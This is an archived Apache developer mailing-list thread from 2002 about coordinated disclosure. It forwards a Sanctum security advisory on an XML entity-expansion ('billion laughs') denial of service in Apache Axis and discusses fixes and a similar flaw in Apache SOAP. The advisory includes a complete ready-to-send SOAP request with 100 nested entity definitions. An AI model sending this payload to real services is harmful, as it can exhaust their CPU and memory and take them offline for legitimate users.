Note that this vulnarability exists in Apache SOAP because we use the DOM parser and there's no way to shut turn off entity expansion AFAIK. The only solution would be to do some Xerces specific thing and lose the JAXP capability .. which would suck.
Sanjiva. ----- Original Message ----- From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Tuesday, November 26, 2002 4:27 PM Subject: Re: Fw: Security Alert - Apache/Axis > > Tom/Dims, > > Could you folks verify this and report back to [EMAIL PROTECTED] that > each of those are 100% taken care of ? > > Then security@ can report back to the various constituencies, work with > CERT if that is needed, etc. If you have any thoughds/statement which need > to be added - make sure you add that. > > Dw > > On Tue, 26 Nov 2002, Davanum Srinivas wrote: > > > I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2) > > > > Thanks, > > dims > > > > --- Ted Leung <[EMAIL PROTECTED]> wrote: > > > This security alert came through today. > > > > > > Ted > > > ----- Original Message ----- > > > From: "Ian Holsman" <[EMAIL PROTECTED]> > > > To: <[EMAIL PROTECTED]> > > > Cc: "Ory Segal" <[EMAIL PROTECTED]> > > > Sent: Tuesday, November 26, 2002 8:02 AM > > > Subject: Security Alert - Apache/Axis > > > > > > > > > > Dear [EMAIL PROTECTED], > > > > > > > > During a recent security audit at one of our customers, Sanctum found a > > > > security vulnerability in your product Apache/Axis. > > > > The details of this vulnerability are described in the attached text file. > > > > > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site > > > > forums about this vulnerability the last week of November. Please note, > > > the > > > > advisory will not contain specifics that might enable someone to exploit > > > the > > > > vulnerability. > > > > > > > > We would appreciate it if you could issue a patch in that timeline (i.e. > > > > around November 25th), so it can be linked to our advisory. > > > > > > > > Please feel free to contact me for more information/help. > > > > > > > > Thanks, > > > > -Amit > > > > > > > > <<XML_DTD_Axis.txt>> > > > > > > > > > > > > > > > > > -------------------------------------------------------------------------- -- > > > ---- > > > > > > > > > > --------------------------------------------------------------------- > > > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > > > For additional commands, e-mail: [EMAIL PROTECTED] > > > > /////////////////////////////////////////////////////////////////////// > > > ========================>> Security Advisory <<======================== > > > /////////////////////////////////////////////////////////////////////// > > > > > > > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/ > > > > > > => Release date: 14/Nov/2002 > > > > > > => Vendor: Apache Group > > > > > > The following product was found to be vulnerable: > > > > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat) > > > > > > The versions affected are the latest ones (as of October 2002). > > > > > > => Severity: High > > > > > > => CVE candidate: Not assigned yet. > > > > > > => Summary: Using the DTD part of the XML document, it is possible to cause the > > > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in > > > a denial of service condition. > > > > > > => Description: The DTD part of the XML document enables the document to define > > > named entities (other than the predefined <, >, etc.). The entities can be > > > defined using other entities (recursion is prohibited in XML 1.0). > > > Entities are expanded when they are referenced, inside the XML document. > > > The attack is comprised of defining and referencing an entity which is defined > > > using two instances of another entity, which is (in turn) defined as two instances > > > of yet another entity, and so on. This definition process can be repeated as long > > > as "necessary" - we found that nesting level of 100 is usually sufficient. > > > The 100th entity should be defined simply as a string. This has the effect of having > > > the first entity contain, in theory, 2^99 (two to the power of ninety nine) > > > concatenated values of the 100th entity. > > > Here's an example (the DTD is to be placed after the XML declaration, and before the > > > root element of the XML document): > > > > > > <!DOCTYPE root [ > > > <!ENTITY x100 "foobar"> > > > <!ENTITY x99 "&x100;&x100;"> > > > <!ENTITY x98 "&x99;&x99;"> > > > <!ENTITY x97 "&x98;&x98;"> > > > ... > > > <!ENTITY x3 "&x4;&x4;"> > > > <!ENTITY x2 "&x3;&x3;"> > > > <!ENTITY x1 "&x2;&x2;"> > > > ]> > > > > > > Referring to the first entity inside a document that would otherwise be accepted by > > > the application (using the syntax &x1;), results in a DoS condition, due to the > > > excessive CPU load and/or memory load required by the XML parser to expand this entity. > > > > > > => Solution: Not available yet. > > > > > > => Workaround: Not available yet. > > > > > > => Example: > > > > > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring > > > only a path to an existing web service to be known to the attacker. > > > > > > The request is: > > > > > > POST path_to_web_service HTTP/1.0 > > > Host: ... > > > Content-Type: text/xml > > > SOAPAction: "" > > > Content-Length: 3224 > > > > > > <?xml version="1.0" ?> > > > <!DOCTYPE foobar [ > > > <!ENTITY x0 "hello"> > > > <!ENTITY x1 "&x0;&x0;"> > > > <!ENTITY x2 "&x1;&x1;"> > > > <!ENTITY x3 "&x2;&x2;"> > > > <!ENTITY x4 "&x3;&x3;"> > > > <!ENTITY x5 "&x4;&x4;"> > > > <!ENTITY x6 "&x5;&x5;"> > > > <!ENTITY x7 "&x6;&x6;"> > > > <!ENTITY x8 "&x7;&x7;"> > > > <!ENTITY x9 "&x8;&x8;"> > > > <!ENTITY x10 "&x9;&x9;"> > > > <!ENTITY x11 "&x10;&x10;"> > > > <!ENTITY x12 "&x11;&x11;"> > > > <!ENTITY x13 "&x12;&x12;"> > > > <!ENTITY x14 "&x13;&x13;"> > > > <!ENTITY x15 "&x14;&x14;"> > > > <!ENTITY x16 "&x15;&x15;"> > > > <!ENTITY x17 "&x16;&x16;"> > > > <!ENTITY x18 "&x17;&x17;"> > > > <!ENTITY x19 "&x18;&x18;"> > > > <!ENTITY x20 "&x19;&x19;"> > > > <!ENTITY x21 "&x20;&x20;"> > > > <!ENTITY x22 "&x21;&x21;"> > > > <!ENTITY x23 "&x22;&x22;"> > > > <!ENTITY x24 "&x23;&x23;"> > > > <!ENTITY x25 "&x24;&x24;"> > > > <!ENTITY x26 "&x25;&x25;"> > > > <!ENTITY x27 "&x26;&x26;"> > > > <!ENTITY x28 "&x27;&x27;"> > > > <!ENTITY x29 "&x28;&x28;"> > > > <!ENTITY x30 "&x29;&x29;"> > > > <!ENTITY x31 "&x30;&x30;"> > > > <!ENTITY x32 "&x31;&x31;"> > > > <!ENTITY x33 "&x32;&x32;"> > > > <!ENTITY x34 "&x33;&x33;"> > > > <!ENTITY x35 "&x34;&x34;"> > > > <!ENTITY x36 "&x35;&x35;"> > > > <!ENTITY x37 "&x36;&x36;"> > > > <!ENTITY x38 "&x37;&x37;"> > > > <!ENTITY x39 "&x38;&x38;"> > > > <!ENTITY x40 "&x39;&x39;"> > > > <!ENTITY x41 "&x40;&x40;"> > > > <!ENTITY x42 "&x41;&x41;"> > > > <!ENTITY x43 "&x42;&x42;"> > > > <!ENTITY x44 "&x43;&x43;"> > > > <!ENTITY x45 "&x44;&x44;"> > > > <!ENTITY x46 "&x45;&x45;"> > > > <!ENTITY x47 "&x46;&x46;"> > > > <!ENTITY x48 "&x47;&x47;"> > > > <!ENTITY x49 "&x48;&x48;"> > > > <!ENTITY x50 "&x49;&x49;"> > > > <!ENTITY x51 "&x50;&x50;"> > > > <!ENTITY x52 "&x51;&x51;"> > > > <!ENTITY x53 "&x52;&x52;"> > > > <!ENTITY x54 "&x53;&x53;"> > > > <!ENTITY x55 "&x54;&x54;"> > > > <!ENTITY x56 "&x55;&x55;"> > > > <!ENTITY x57 "&x56;&x56;"> > > > <!ENTITY x58 "&x57;&x57;"> > > > <!ENTITY x59 "&x58;&x58;"> > > > <!ENTITY x60 "&x59;&x59;"> > > > <!ENTITY x61 "&x60;&x60;"> > > > <!ENTITY x62 "&x61;&x61;"> > > > <!ENTITY x63 "&x62;&x62;"> > > > <!ENTITY x64 "&x63;&x63;"> > > > <!ENTITY x65 "&x64;&x64;"> > > > <!ENTITY x66 "&x65;&x65;"> > > > <!ENTITY x67 "&x66;&x66;"> > > > <!ENTITY x68 "&x67;&x67;"> > > > <!ENTITY x69 "&x68;&x68;"> > > > <!ENTITY x70 "&x69;&x69;"> > > > <!ENTITY x71 "&x70;&x70;"> > > > <!ENTITY x72 "&x71;&x71;"> > > > <!ENTITY x73 "&x72;&x72;"> > > > <!ENTITY x74 "&x73;&x73;"> > > > <!ENTITY x75 "&x74;&x74;"> > > > <!ENTITY x76 "&x75;&x75;"> > > > <!ENTITY x77 "&x76;&x76;"> > > > <!ENTITY x78 "&x77;&x77;"> > > > <!ENTITY x79 "&x78;&x78;"> > > > <!ENTITY x80 "&x79;&x79;"> > > > <!ENTITY x81 "&x80;&x80;"> > > > <!ENTITY x82 "&x81;&x81;"> > > > <!ENTITY x83 "&x82;&x82;"> > > > <!ENTITY x84 "&x83;&x83;"> > > > <!ENTITY x85 "&x84;&x84;"> > > > <!ENTITY x86 "&x85;&x85;"> > > > <!ENTITY x87 "&x86;&x86;"> > > > <!ENTITY x88 "&x87;&x87;"> > > > <!ENTITY x89 "&x88;&x88;"> > > > <!ENTITY x90 "&x89;&x89;"> > > > <!ENTITY x91 "&x90;&x90;"> > > > <!ENTITY x92 "&x91;&x91;"> > > > <!ENTITY x93 "&x92;&x92;"> > > > <!ENTITY x94 "&x93;&x93;"> > > > <!ENTITY x95 "&x94;&x94;"> > > > <!ENTITY x96 "&x95;&x95;"> > > > <!ENTITY x97 "&x96;&x96;"> > > > <!ENTITY x98 "&x97;&x97;"> > > > <!ENTITY x99 "&x98;&x98;"> > > > <!ENTITY x100 "&x99;&x99;"> > > > ]> > > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"; > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema";> > > > <SOAP-ENV:Body> > > > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";> > > > <foobar xsi:type="xsd:string">&x100;</foobar> > > > </ns1:aaa> > > > </SOAP-ENV:Body> > > > </SOAP-ENV:Envelope> > > > > > > > > > > > > ===== > > Davanum Srinivas - http://xml.apache.org/~dims/ > > > > __________________________________________________ > > Do you Yahoo!? > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > > http://mailplus.yahoo.com > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > For additional commands, e-mail: [EMAIL PROTECTED] > > > >
